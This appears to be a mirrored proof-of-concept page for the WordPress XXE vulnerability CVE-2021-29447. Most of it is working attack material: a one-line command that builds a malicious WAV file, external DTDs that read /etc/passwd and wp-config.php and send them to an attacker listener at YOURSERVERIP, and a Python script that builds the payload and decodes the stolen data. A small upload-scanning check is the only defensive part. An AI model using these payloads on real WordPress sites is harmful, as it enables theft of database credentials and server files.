POC details: b95e3dbefe3a99dc6c79ec9a349eab600a3326c4

Source
Related vulnerability
Title: WordPress code issue vulnerability (CVE-2021-29447)
Description: WordPress is a blog platform developed in PHP by the WordPress Foundation; it is used to host personal blog sites on servers running PHP and MySQL. WordPress contains a code issue vulnerability: an attacker who carries out a successful XXE attack can use it to read internal files.
Introduction
# CVE-2021-29447


## Impact
Arbitrary File Disclosure: the content of any file readable by the web server process could be retrieved, e.g. wp-config.php, which contains sensitive data such as database credentials.
Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment (internal services, cloud metadata endpoints), this can have a serious impact.

The bug is an XXE in the bundled getID3 library, which parses the iXML chunk of an uploaded WAV file while WordPress extracts media metadata. It affects WordPress 5.6.0 to 5.7.0 running on PHP 8 (fixed in 5.7.1), and the attacker needs an account that is allowed to upload media (Author role or above).
## Exploiting the vulnerability

A WordPress site affected by this vulnerability was identified during enumeration with the help of the wpscan tool.

![image](https://user-images.githubusercontent.com/5285547/131178616-3a5cbe8b-9bde-4804-9c1d-f63dcb417a18.png)

## Creating a malicious WAV file

From a bash shell, write the WAV file with a single command:

```
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSERVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```

The file is a RIFF/WAVE container whose only chunk is `iXML`; getID3 hands that chunk to the XML parser when WordPress extracts metadata from the upload. `%remote;` fetches your external DTD, `%init;` declares the `trick` parameter entity, and `%trick;` makes the parser request the URL that carries the file content. Replace YOURSERVERIP, PORT and NAMEEVIL.dtd with your listener and DTD file name. The `\x7b` (123) after `iXML` is the chunk length and must equal the length of the XML text, so recompute it whenever your URL has a different length; the trailing `\x00` is the RIFF pad byte that rounds an odd-length chunk up to an even size.

On the attacker machine, create the DTD that the victim's XML parser will fetch and evaluate:

```
<!-- read the target through php://filter: deflate then base64, so newlines, '<' and '&' cannot break the XML or the URL -->
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!-- &#x25; is "%": this declares a parameter entity whose SYSTEM URL embeds the encoded file -->
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
```


Note: to read WordPress files, use a relative path with the syntax "../WP-FILE.php". The upload is handled from the wp-admin directory, so "../" resolves to the installation root (e.g. ../wp-config.php for the database credentials).

```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
```

Serve the directory containing the DTD with a simple HTTP server, e.g. `python3 -m http.server 8081`, and upload payload.wav through the media library as a user with upload rights. The exfiltrated file arrives base64-encoded in the `p=` query string of the request the server logs; base64-decode it and decompress the result (PHP's zlib.deflate filter emits a raw deflate stream) to recover the content.
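As an added example (it is not code from the original PoC repository), the following Python script reproduces the procedure above with the RIFF and iXML chunk sizes computed from the payload instead of counted by hand, generates the DTD, walks the RIFF chunk list the way an upload scanner would to flag a DOCTYPE inside an iXML chunk, and decodes the `p=` value that lands in the listener log. The listener URL (http://YOURSERVERIP:8081), the file names payload.wav and evil.dtd, and the sample /etc/passwd line are assumptions made for this example.

```python
# Added example, not part of the original PoC: builds the WAV payload and
# the DTD with computed chunk sizes, inspects RIFF files for the XXE marker,
# and decodes what the listener receives. Listener URL, file names and the
# sample /etc/passwd text are assumptions.
import base64
import struct
import zlib
from urllib.parse import unquote, urlparse

LISTENER = "http://YOURSERVERIP:8081"   # assumed attacker listener


def build_wav(dtd_url: str) -> bytes:
    """Minimal RIFF/WAVE file whose only chunk is an iXML chunk carrying the
    XXE trigger. Sizes come from the payload, so a longer or shorter DTD URL
    never leaves the header inconsistent."""
    xml = (
        '<?xml version="1.0"?><!DOCTYPE ANY['
        f"<!ENTITY % remote SYSTEM '{dtd_url}'>"
        "%remote;%init;%trick;]>"
    ).encode()
    chunk = b"iXML" + struct.pack("<I", len(xml)) + xml
    if len(xml) % 2:                       # RIFF pads odd chunks to even length
        chunk += b"\x00"
    body = b"WAVE" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def build_dtd(resource: str, callback_url: str = LISTENER) -> str:
    """External DTD fetched by the victim's parser: %file reads `resource`
    through php://filter (deflate, then base64); %init declares the `trick`
    entity whose SYSTEM URL carries the encoded content to the listener."""
    return (
        '<!ENTITY % file SYSTEM "php://filter/zlib.deflate/'
        f'read=convert.base64-encode/resource={resource}">\n'
        '<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM '
        f"'{callback_url}/?p=%file;'\" >\n"
    )


def parse_riff(data: bytes) -> dict:
    """Walk the chunk list of a RIFF/WAVE file and return {chunk id: payload},
    rejecting headers whose sizes do not match the data."""
    if data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    if struct.unpack("<I", data[4:8])[0] != len(data) - 8:
        raise ValueError("RIFF size does not match file length")
    chunks, pos = {}, 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4].decode("ascii", "replace")
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        payload = data[pos + 8:pos + 8 + size]
        if len(payload) != size:
            raise ValueError(f"truncated chunk {cid!r}")
        chunks[cid] = payload
        pos += 8 + size + (size % 2)       # step over the pad byte as well
    return chunks


def looks_malicious(data: bytes) -> bool:
    """Defender-side check for uploads: an iXML chunk holds plain metadata,
    so a DOCTYPE or ENTITY declaration inside it is a strong signal."""
    ixml = parse_riff(data).get("iXML", b"")
    return b"<!DOCTYPE" in ixml or b"<!ENTITY" in ixml


def encode_like_php_filter(content: bytes) -> str:
    """Simulates what php://filter/zlib.deflate/read=convert.base64-encode
    emits (raw deflate, no zlib header) so the decoder can be tested offline."""
    comp = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    return base64.b64encode(comp.compress(content) + comp.flush()).decode()


def decode_exfil(request_line: str) -> bytes:
    """Recover the file from a logged request such as
    'GET /?p=<base64> HTTP/1.1'. The query is split by hand rather than with
    parse_qs, which would turn the '+' of base64 into spaces."""
    query = urlparse(request_line.split()[1]).query
    params = dict(kv.partition("=")[::2] for kv in query.split("&"))
    raw = base64.b64decode(unquote(params["p"]))
    try:
        return zlib.decompress(raw, -zlib.MAX_WBITS)      # raw deflate
    except zlib.error:
        return zlib.decompress(raw, zlib.MAX_WBITS | 32)  # zlib/gzip wrapped


if __name__ == "__main__":
    with open("payload.wav", "wb") as f:
        f.write(build_wav(f"{LISTENER}/evil.dtd"))
    with open("evil.dtd", "w") as f:
        f.write(build_dtd("../wp-config.php"))
    # Constructed sample of a listener log line, built offline for the demo.
    sample = "GET /?p=" + encode_like_php_filter(b"root:x:0:0:root:/root:/bin/bash\n") + " HTTP/1.1"
    print(decode_exfil(sample).decode())
```

Run it as a script to write payload.wav and evil.dtd, serve the directory as described above, and paste the logged request line into decode_exfil() to recover the file. The decoder tries raw deflate first, which is what PHP's zlib.deflate filter emits, and falls back to a zlib or gzip wrapped stream; looks_malicious() is the check a media-upload hook or scanner would apply to reject such files.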

## References
https://github.com/motikan2010/CVE-2021-29447
https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5
File snapshot

```
[4.0K] /data/pocs/b95e3dbefe3a99dc6c79ec9a349eab600a3326c4
└── [1.6K] README.md

0 directories, 1 file
```
Cached for you by the Shenlong bot.
Notes
    1. Prefer accessing the POC through the source link.
    2. If the source has gone offline or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.